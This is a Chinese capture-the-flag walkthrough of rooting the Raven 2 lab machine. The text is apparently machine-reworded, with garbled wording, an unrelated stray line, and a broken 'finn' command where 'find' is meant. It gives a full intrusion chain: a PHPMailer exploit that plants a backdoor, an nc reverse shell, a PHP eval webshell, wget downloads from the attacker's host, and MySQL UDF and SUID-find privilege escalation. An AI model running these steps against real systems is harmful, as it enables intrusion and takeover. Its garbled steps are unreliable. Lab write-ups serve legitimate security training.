Raven 2 靶机渗透

前言

近几天对照闲,在上周也闲着无聊跑去盒子挖了一周的洞。这周又最先不知道干些啥了,以是就找个靶机来玩玩。

Raven 2 靶机渗透

搭建完环境后,发现并没有登录账号和密码,使用御剑高速扫描,先扫描机械的ip和端口,看看有没有啥能行使到的。
Raven 2 靶机渗透

发现了192.168.27.136 ip 而且80端口和22端口是开启的,首先先从80端口,实验 来实验扫描目录。
Raven 2 靶机渗透

扫描目录时,发现了/vendor/目录而且有个wordpress 这时刻就可以来实验一下wp的破绽了,直接上wpscan 来扫描,没有就放弃。

Raven 2 靶机渗透

毗邻超时!!! 武断放弃!!!

然则作为一个年轻小伙子怎么能说放弃,要坚持!!![手动狗头][手动狗头]

翻找一下刚刚的目录看看还能不能找到啥器械,当我点开/vendor/目录的时刻,发现存在一个目录遍历破绽。
Raven 2 靶机渗透

点开readme.md 发现是个PHPMailer

Raven 2 靶机渗透

由于以前也没见过,上百度查了一下才知道是个发送电子邮件的函数包。

去百度查找了一下 居然有下令执行破绽。

为了利便,直接就在kali内里的破绽库去查找exp

searchsploit phpmailer

Raven 2 靶机渗透

这里有好几个exp,然则也不能一个一个去试,行使条件不一样,还得去查找的他版本。
在我开启vendor/version文件的时刻,直接就显示了版本

Raven 2 靶机渗透

确定版本后就可以直接下载exp了,

searchsploit -m 40974.py

Raven 2 靶机渗透

首先查看一下代码。
Raven 2 靶机渗透

这里的garget 和socket的connect的ip需要修改另有需要修改的是email字典后面的路径,这个是写入地址的绝对路径。

那么我们还需要查找他的绝对路径。

http://192.168.27.136/vendor/PATH

文件内里查找到了路径,而且拿下了一个flag。

Raven 2 靶机渗透

这里并不计划去拿flag,而是直接拿权限[手动滑稽][手动滑稽]。

现在就可以最先来改我们的exp了
Raven 2 靶机渗透

这里把target改成了

http://192.168.27.136/contact.php
这个破绽是基于contact.php的页面发生的破绽,以是地址得带上这个页面。

在运行exp的时刻,py爆了个错误,说我的编码有错误,我立马在头部加了一个utf-8的默认编码方式,然则依然不行,肯定是这个工具启动提醒的时刻,输出了特殊字符以是才会这样,把它删掉就好了[手动滑稽][手动滑稽]。

Raven 2 靶机渗透

这里直接就执行乐成,我们去接见contact.php就会天生一个backdoor.php,接见后可以直接反弹shell了
kali启动一个nc监听

nc -lvp 4444

接见backdoor.php 反弹乐成
Raven 2 靶机渗透

nc 模式的shell不支持su交互,使用py进入到伪终端

python -c “import pty;pty.spawn(‘/bin/bash’)”

Raven 2 靶机渗透

输入whoami发现,是个www的权限,权限对照低,还需要举行提权的操作,先来查看一下开放的端口

netstat -ano

Raven 2 靶机渗透

发现他的3306端口是开放的,mysql 5.6以下的默认安装为system权限或者是root权限。这里实验使用udf提权,先来翻找他的mysql密码,
一样平常网站需要对数据库举行查询操作的话都是需要毗邻数据库的,基本上都会去包罗数据库的毗邻文件,而数据库毗邻文件一样平常命名为config.inc.php,config.php。
这里就来找一下,进入wordpress目录看到wp-config.php来查看一下。
Raven 2 靶机渗透

翻找到了root账号的密码为:

ASP.NET Core 3.x API版本控制

R@v3nSecurity

然后就可以实验去udf提权,然则我这嫌nc对照贫苦,以是照样写入一个一句话木马。

echo “<?php eval(@$_POST[‘a’]); ?>” > 1.php

Raven 2 靶机渗透

写入的时刻发现post被过滤掉了,厥后实验get和requsts也是一样。

那么就直接换个思绪,直接让他去请求远程的文件举行下载

放在服务器上面的时刻,不能一剧本花样举行上传,否则剧本会直接运行,将他命名为cmd.txt文件,然后搭建暂且web服务

php -S 0.0.0.0:88 -t /root

使用php启动web服务 设置根目录为root

wget http://192.168.3.68:88/cmd.txt

请求文件

mv cmd.txt cmd.php
把文件改名为php后缀,然后使用蚁剑举行毗邻。

毗邻乐成后,使用治理数据功效,举行mysql毗邻,查询mysql版本信息。
Raven 2 靶机渗透

这里另有几个注意事项,在mysql 4.1版本前任何的dll文件的函数都能导入到mysql内里去让mysql挪用,
mysql 4.1-5.0 版本中,对注册的dll位置做了限制,建立函数时刻对应的dll不能包罗斜杠或者反斜杠,
不能是绝对路径,以是会将dll导出到systm32目录下,去绕过这个限制。
在mysql5.1版本后,建立函数的dll只能放在mysql的plugin目录下,也就是插件目录

使用mysql语句来查看plugin目录位置

show variables like ‘%plugin%’;

Raven 2 靶机渗透

现在我们还得下载一个linux版本的udf

searchsploit udf

searchsploit -m 1518.c

从破绽库把udf下载下来后,是个c文件还得使用gcc举行编译后才气使用

gcc -g -c 1518.c

gcc -g -shared -o udf.so 1518.o -lc

编译完成后,使用wget远程下载

wget http://192.168.3.68:88/udf.so

数据库建立表:

create table nice(line blob);

表中插入udf.so的数据

insert into nice values(load_file(‘/var/www/html/udf.so’));

插入完成后,再使用sql语句从nice表中导出数据到plugin目录下

select * from nice into dumpfile ‘/usr/lib/mysql/plugin/udf.so’;

导出完成后,这里就可以直接建立一个函数,来举行执行下令了

create function do_system returns integer soname ‘udf.so’;

建立完成后可以查询是否建立乐成

select * from mysql.func;

select do_system(‘chmod u+s /usr/bin/find’);

touch finn

finn -exec “/bin/sh” ;

whoami

Raven 2 靶机渗透
提权乐成。

cat flag4.txt

[手动狗头][手动狗头]flag真香

Raven 2 靶机渗透

末端

最近这感冒了,很难受,干啥都没精神,我想我照样需要妹子来温暖我的心
Raven 2 靶机渗透

原创文章,作者:28x29新闻网,如若转载,请注明出处:https://www.28x29.com/archives/13195.html